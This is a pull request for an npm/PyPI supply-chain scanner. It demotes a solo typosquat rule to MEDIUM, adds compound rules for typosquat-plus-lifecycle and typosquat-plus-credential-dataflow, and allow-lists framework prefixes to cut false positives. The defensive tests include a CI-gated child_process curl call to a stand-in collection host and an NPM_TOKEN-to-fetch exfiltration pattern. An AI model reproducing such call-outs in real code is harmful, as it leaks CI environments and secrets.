### PR TITLE
v2.11.20 - Sprint 5 RT-C1-FPR fixes

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.19",
+  "version": "2.11.20",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.19",
+      "version": "2.11.20",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.4.3",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.19",
+  "version": "2.11.20",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -168,6 +168,11 @@ const PLAYBOOKS = {
     'Le code charge cette dep typosquattee via require/import. Si ce n\'est pas intentionnel, supprimer la dep et la reference, puis reinstaller avec --ignore-scripts.',
   dependency_typosquat_require:
     'CRITIQUE — pattern Axios UNC1069 detecte: dep typosquattee declaree ET chargee dans le code. Le wrapper apparent est probablement legitime mais sa dep contient le payload. Bloquer l\'install (--ignore-scripts), supprimer la dep, auditer le history de modifications.',
+  // RT-C1-FPR (audit 2026-05)
+  typosquat_lifecycle:
+    'CRITIQUE — pattern boundary-squat avec hook lifecycle: la dep typosquattee sera executee a l\'install. Bloquer l\'install (--ignore-scripts), supprimer la dep, regenerer les secrets exposes, auditer le history.',
+  typosquat_dataflow:
+    'IMPORTANT — dep boundary-squat coexistante avec un flux credentials → reseau dans le code. Verifier si la dep est require()d depuis le fichier d\'exfil. Si oui = CRITICAL (compound dependency_typosquat_require complementaire).',
 
   dangerous_call_function:
     'Appel new Function() detecte. Equivalent a eval(). Verifier la source des donnees.',

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -350,9 +350,13 @@ const RULES = {
   dependency_typosquat: {
     id: 'MUADDIB-TYPO-002',
     name: 'Dependency Boundary-Squat',
-    severity: 'HIGH',
+    // RT-C1-FPR (audit 2026-05): demoted HIGH -> MEDIUM. Boundary-squat alone is
+    // a name-resemblance heuristic without execution proof. Compounds typosquat_lifecycle
+    // (CRITICAL), typosquat_dataflow (HIGH), dependency_typosquat_require (CRITICAL)
+    // escalate when co-occurring with real execution/exfil signals.
+    severity: 'MEDIUM',
     confidence: 'high',
-    description: 'Une dependance declaree porte le nom d\'un package populaire prefixe/suffixe d\'un token suspect (Axios UNC1069, mars 2026). Le wrapper innocent declare un sub-dep malveillant.',
+    description: 'Une dependance declaree porte le nom d\'un package populaire prefixe/suffixe d\'un token suspect (Axios UNC1069, mars 2026). Le wrapper innocent declare un sub-dep malveillant. Signal solo MEDIUM, escalade CRITICAL via compounds lifecycle/dataflow/require.',
     references: [
       'https://snyk.io/blog/typosquatting-attacks/',
       'https://attack.mitre.org/techniques/T1195/002/'
@@ -374,6 +378,25 @@ const RULES = {
     severity: 'CRITICAL',
     confidence: 'high',
     description: 'Dependance boundary-squat declaree ET chargee via require/import dans le code: pattern Axios UNC1069 (sub-dep injection avec wrapper innocent).',
+    references: ['https://attack.mitre.org/techniques/T1195/002/'],
+    mitre: 'T1195.002'
+  },
+  // RT-C1-FPR (audit 2026-05): compounds escaladant dependency_typosquat solo (MEDIUM)
+  typosquat_lifecycle: {
+    id: 'MUADDIB-COMPOUND-014',
+    name: 'Boundary-Squat Dep + Lifecycle Hook',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Dependance boundary-squat declaree avec script lifecycle (preinstall/postinstall) — install-time payload delivery via typosquat sub-dep.',
+    references: ['https://attack.mitre.org/techniques/T1195/002/'],
+    mitre: 'T1195.002'
+  },
+  typosquat_dataflow: {
+    id: 'MUADDIB-COMPOUND-015',
+    name: 'Boundary-Squat Dep + Suspicious Dataflow',
+    severity: 'HIGH',
+    confidence: 'high',
+    description: 'Dependance boundary-squat declaree avec flux de donnees suspect (lecture credentials + envoi reseau) — typosquat dep co-occurring with exfiltration.',
     references: ['https://attack.mitre.org/techniques/T1195/002/'],
     mitre: 'T1195.002'
   },

--- a/src/scanner/typosquat.js
+++ b/src/scanner/typosquat.js
@@ -389,7 +389,11 @@ async function scanTyposquatting(targetPath) {
       + bMatch.original + '" (extra token: "' + bMatch.extra + '"). Axios UNC1069 pattern.';
     threats.push({
       type: 'dependency_typosquat',
-      severity: 'HIGH',
+      // RT-C1-FPR (audit 2026-05): demoted HIGH -> MEDIUM. Boundary-squat alone is
+      // a heuristic signal (name resemblance, no execution proof). The compounds
+      // typosquat_lifecycle (CRITICAL) and typosquat_dataflow (HIGH) escalate when
+      // co-occurring with real execution/exfil signals.
+      severity: 'MEDIUM',
       message: declMsg,
       file: 'package.json',
       details: {

--- a/src/scanner/typosquat.js
+++ b/src/scanner/typosquat.js
@@ -30,6 +30,23 @@ const POPULAR_PACKAGES = [
   'crypto-js'
 ];
 
+// RT-C1-FPR (audit 2026-05): frameworks dont les packages d'ecosysteme ont la
+// convention <framework>-<role>-<extension> (eslint-plugin-react, babel-preset-env,
+// gatsby-plugin-mdx, eslint-import-resolver-typescript). Un dep dont le PREMIER
+// segment hyphene est dans ce Set est une extension legitime du framework, jamais
+// un squat d'un autre package -- quelles que soient les autres segments.
+// EXCLUS volontairement : react, vue, angular, svelte, typescript. Leurs packages
+// d'ecosysteme ont le framework EN SUFFIXE (eslint-plugin-react), donc la convention
+// prefixe ne s'applique pas et conserver la detection de squats `react-token-exfil`
+// reste prioritaire.
+const ECOSYSTEM_FRAMEWORK_PREFIXES = new Set([
+  'eslint', 'babel', 'webpack', 'rollup', 'vite', 'parcel', 'esbuild', 'swc', 'tsup',
+  'gatsby', 'next', 'nuxt', 'remix', 'expo', 'metro',
+  'jest', 'mocha', 'karma', 'cypress', 'playwright', 'vitest',
+  'postcss', 'stylelint', 'prettier', 'typedoc',
+  'storybook', 'docusaurus', 'astro'
+]);
+
 // RT-C1: Hyphen tokens that legitimately PREFIX or SUFFIX popular package names.
 // `<token>-<popular>` or `<popular>-<token>` is considered benign when the extra
 // token is in this set (ecosystem qualifiers, framework prefixes, official scopes).
@@ -557,6 +574,14 @@ function findTyposquatMatch(name) {
 }
 
 function isLegitimateVariant(name) {
+  // RT-C1-FPR (audit 2026-05): ecosystem framework prefix -> legitimate extension.
+  // Ex: eslint-import-resolver-typescript, babel-loader-svelte, gatsby-source-fs.
+  const firstHyphen = name.indexOf('-');
+  if (firstHyphen > 0) {
+    const prefix = name.slice(0, firstHyphen);
+    if (ECOSYSTEM_FRAMEWORK_PREFIXES.has(prefix)) return true;
+  }
+
   // Suffixes legitimes qui ne sont PAS du typosquatting
   const legitimateSuffixes = [
     '-cli', '-core', '-utils', '-plugin', '-loader', '-webpack',

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -510,6 +510,30 @@ const SCORING_COMPOUNDS = [
     fileFrom: 'dependency_typosquat_used'
   },
   {
+    // RT-C1-FPR (audit 2026-05): boundary-squat dep + lifecycle hook → install-time
+    // payload delivery via typosquat sub-dep. Mirror of dependency_typosquat_require
+    // but with lifecycle instead of _used: stronger signal — proves install-time
+    // execution intent without requiring explicit require() in scanned code.
+    type: 'typosquat_lifecycle',
+    requires: ['dependency_typosquat', 'lifecycle_script'],
+    severity: 'CRITICAL',
+    message: 'Boundary-squat dependency + lifecycle hook — install-time payload delivery via typosquat sub-dep (scoring compound).',
+    fileFrom: 'dependency_typosquat'
+    // No sameFile: both are package.json-level
+  },
+  {
+    // RT-C1-FPR (audit 2026-05): boundary-squat dep + suspicious dataflow → typosquat
+    // dep co-occurring with credential exfil. Mirror of lifecycle_dataflow (HIGH) —
+    // co-occurrence without direct causal link, so HIGH not CRITICAL.
+    type: 'typosquat_dataflow',
+    requires: ['dependency_typosquat', 'suspicious_dataflow'],
+    severity: 'HIGH',
+    message: 'Boundary-squat dependency + suspicious dataflow — typosquat dep co-occurring with credential exfil (scoring compound).',
+    fileFrom: 'suspicious_dataflow',
+    // No sameFile: dep is package.json, dataflow is src/*.js
+    excludeIfBundled: true
+  },
+  {
     type: 'lifecycle_inline_exec',
     requires: ['lifecycle_script', 'node_inline_exec'],
     severity: 'CRITICAL',

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 231 (226 RULES + 5 PARANOID)', () => {
+  test('v8b: rule count is 233 (228 RULES + 5 PARANOID, audit 2026-05 Sprint 5 RT-C1-FPR: +2 compound rules)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 226, `Expected 226 RULES, got ${ruleCount}`);
+    assert(ruleCount === 228, `Expected 228 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/compound-scoring.test.js
+++ b/tests/integration/compound-scoring.test.js
@@ -854,6 +854,82 @@ async function runCompoundScoringTests() {
     const compounds = threats.filter(t => t.type === 'obfuscated_lifecycle_env');
     assert(compounds.length === 1, `Should not duplicate, got ${compounds.length}`);
   });
+
+  // ===================================================================
+  // RT-C1-FPR (audit 2026-05): typosquat compounds escalating dependency_typosquat MEDIUM
+  // ===================================================================
+  console.log('\n  --- RT-C1-FPR: typosquat compounds ---\n');
+
+  // --- typosquat_lifecycle ---
+  test('RT-C1-FPR: typosquat_lifecycle — positive (dep + lifecycle)', () => {
+    const threats = [
+      { type: 'dependency_typosquat', severity: 'MEDIUM', file: 'package.json', message: 'plain-crypto-js boundary-squat of crypto-js' },
+      { type: 'lifecycle_script', severity: 'MEDIUM', file: 'package.json', message: 'postinstall: node ./bootstrap.js' }
+    ];
+    applyCompoundBoosts(threats);
+    const compound = threats.find(t => t.type === 'typosquat_lifecycle');
+    assert(compound, 'typosquat_lifecycle compound should fire');
+    assert(compound.severity === 'CRITICAL', `Should be CRITICAL, got ${compound.severity}`);
+    assert(compound.compound === true, 'Should have compound flag');
+    assert(compound.file === 'package.json', `File should come from dependency_typosquat`);
+  });
+
+  test('RT-C1-FPR: typosquat_lifecycle — negative (only dep)', () => {
+    const threats = [
+      { type: 'dependency_typosquat', severity: 'MEDIUM', file: 'package.json', message: 'plain-crypto-js' }
+    ];
+    applyCompoundBoosts(threats);
+    assert(!threats.find(t => t.type === 'typosquat_lifecycle'), 'Should NOT fire without lifecycle');
+  });
+
+  test('RT-C1-FPR: typosquat_lifecycle — negative (only lifecycle)', () => {
+    const threats = [
+      { type: 'lifecycle_script', severity: 'MEDIUM', file: 'package.json', message: 'preinstall' }
+    ];
+    applyCompoundBoosts(threats);
+    assert(!threats.find(t => t.type === 'typosquat_lifecycle'), 'Should NOT fire without typosquat dep');
+  });
+
+  test('RT-C1-FPR: typosquat_lifecycle — severity gate (all LOW)', () => {
+    // Compounds require at least one component originalSeverity >= MEDIUM.
+    const threats = [
+      { type: 'dependency_typosquat', severity: 'LOW', file: 'package.json', message: 'dep' },
+      { type: 'lifecycle_script', severity: 'LOW', file: 'package.json', message: 'node-gyp rebuild' }
+    ];
+    applyCompoundBoosts(threats);
+    assert(!threats.find(t => t.type === 'typosquat_lifecycle'), 'Should NOT fire when all LOW');
+  });
+
+  // --- typosquat_dataflow ---
+  test('RT-C1-FPR: typosquat_dataflow — positive (dep + dataflow)', () => {
+    const threats = [
+      { type: 'dependency_typosquat', severity: 'MEDIUM', file: 'package.json', message: 'plain-crypto-js' },
+      { type: 'suspicious_dataflow', severity: 'HIGH', file: 'src/exfil.js', message: 'process.env.NPM_TOKEN -> fetch' }
+    ];
+    applyCompoundBoosts(threats);
+    const compound = threats.find(t => t.type === 'typosquat_dataflow');
+    assert(compound, 'typosquat_dataflow compound should fire');
+    assert(compound.severity === 'HIGH', `Should be HIGH, got ${compound.severity}`);
+    assert(compound.file === 'src/exfil.js', `File should come from suspicious_dataflow`);
+  });
+
+  test('RT-C1-FPR: typosquat_dataflow — excludeIfBundled (dataflow in dist/)', () => {
+    const threats = [
+      { type: 'dependency_typosquat', severity: 'MEDIUM', file: 'package.json', message: 'plain-crypto-js' },
+      { type: 'suspicious_dataflow', severity: 'HIGH', file: 'dist/bundle.min.js', message: 'env -> fetch (bundled)' }
+    ];
+    applyCompoundBoosts(threats);
+    assert(!threats.find(t => t.type === 'typosquat_dataflow'),
+      'Should NOT fire when dataflow is in bundled dist/ (excludeIfBundled)');
+  });
+
+  test('RT-C1-FPR: typosquat_dataflow — negative (only dep)', () => {
+    const threats = [
+      { type: 'dependency_typosquat', severity: 'MEDIUM', file: 'package.json', message: 'plain-crypto-js' }
+    ];
+    applyCompoundBoosts(threats);
+    assert(!threats.find(t => t.type === 'typosquat_dataflow'), 'Should NOT fire without dataflow');
+  });
 }
 
 module.exports = { runCompoundScoringTests };

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,12 +157,12 @@ jobs:
     }
   });
 
-  // 3.3b Rule count check (audit 2026-05 Sprint 3 DF-C1+MR-C1: +2 rules → 226 RULES)
-  test('P3: rule count is 231 (226 RULES + 5 PARANOID)', () => {
+  // 3.3b Rule count check (audit 2026-05 Sprint 5 RT-C1-FPR: +2 compound rules → 228 RULES)
+  test('P3: rule count is 233 (228 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 226, `Expected 226 RULES, got ${ruleCount}`);
+    assert(ruleCount === 228, `Expected 228 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/scanner/typosquat.test.js
+++ b/tests/scanner/typosquat.test.js
@@ -73,6 +73,74 @@ async function runTyposquatTests() {
       assert(t, 'Actual typosquat (lodasj for lodash) should still be detected');
     } finally { cleanupTemp(tmp); }
   });
+
+  // =============================================
+  // RT-C1-FPR (audit 2026-05) : ecosystem framework prefixes
+  // Production FP : eslint-import-resolver-typescript fired dependency_typosquat
+  // because the boundary-squat single-token branch matched 'typescript' and the
+  // siblings [eslint, import, resolver] weren't all in LEGIT_BOUNDARY_TOKENS.
+  // Fix: ECOSYSTEM_FRAMEWORK_PREFIXES rejects all deps whose first hyphened token
+  // is a known plugin-ecosystem framework (eslint, babel, gatsby, postcss, ...).
+  // =============================================
+
+  await asyncTest('RT-C1-FPR.a: eslint-import-resolver-typescript -> no dependency_typosquat (real prod FP)', async () => {
+    const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-rt-c1-fpr-'));
+    fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({
+      name: 'benign-app', version: '1.0.0',
+      dependencies: { 'eslint-import-resolver-typescript': '^3.0.0' }
+    }));
+    fs.writeFileSync(path.join(tmp, 'index.js'), 'module.exports = {};');
+    try {
+      const result = await runScanDirect(tmp);
+      const fp = (result.threats || []).find(t =>
+        t.type === 'dependency_typosquat' && t.message.includes('eslint-import-resolver-typescript'));
+      assert(!fp, `FIXED: eslint-import-resolver-typescript ne doit PAS firer dependency_typosquat. Threats: ${JSON.stringify((result.threats || []).map(t => t.type))}`);
+    } finally { cleanupTemp(tmp); }
+  });
+
+  await asyncTest('RT-C1-FPR.b: ecosystem packages (babel-loader-*, gatsby-source-*, etc.) -> no dependency_typosquat', async () => {
+    const ecosystemDeps = [
+      'babel-loader-svelte',
+      'gatsby-source-filesystem',
+      'webpack-cli-serve',
+      'postcss-import-url',
+      'jest-environment-jsdom',
+      'stylelint-config-standard'
+    ];
+    for (const dep of ecosystemDeps) {
+      const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-rt-c1-fpr-'));
+      fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({
+        name: 'benign-app', version: '1.0.0',
+        dependencies: { [dep]: '^1.0.0' }
+      }));
+      fs.writeFileSync(path.join(tmp, 'index.js'), 'module.exports = {};');
+      try {
+        const result = await runScanDirect(tmp);
+        const fp = (result.threats || []).find(t =>
+          t.type === 'dependency_typosquat' && t.message.includes(dep));
+        assert(!fp, `FIXED: ${dep} ne doit PAS firer dependency_typosquat`);
+      } finally { cleanupTemp(tmp); }
+    }
+  });
+
+  await asyncTest('RT-C1-FPR.c (guard): real boundary-squat still detected (plain-crypto-js, react-token-exfil)', async () => {
+    // Verifie qu'Axe 1 ne masque pas des squats sans prefixe d'ecosysteme.
+    const realSquats = ['plain-crypto-js', 'react-token-exfil'];
+    for (const dep of realSquats) {
+      const tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'muaddib-rt-c1-fpr-'));
+      fs.writeFileSync(path.join(tmp, 'package.json'), JSON.stringify({
+        name: 'suspicious-app', version: '1.0.0',
+        dependencies: { [dep]: '*' }
+      }));
+      fs.writeFileSync(path.join(tmp, 'index.js'), 'module.exports = {};');
+      try {
+        const result = await runScanDirect(tmp);
+        const t = (result.threats || []).find(tt =>
+          tt.type === 'dependency_typosquat' && tt.message.includes(dep));
+        assert(t, `GUARD: ${dep} doit toujours firer dependency_typosquat (no over-suppression by ecosystem prefix)`);
+      } finally { cleanupTemp(tmp); }
+    }
+  });
 }
 
 module.exports = { runTyposquatTests };


### PR DESCRIPTION
Ecosystem framework prefix recognition eliminates FP on eslint-plugin-*/babel-preset-*/etc. dependency_typosquat demoted MEDIUM solo, escalated via typosquat_lifecycle (CRITICAL) and typosquat_dataflow (HIGH) compounds.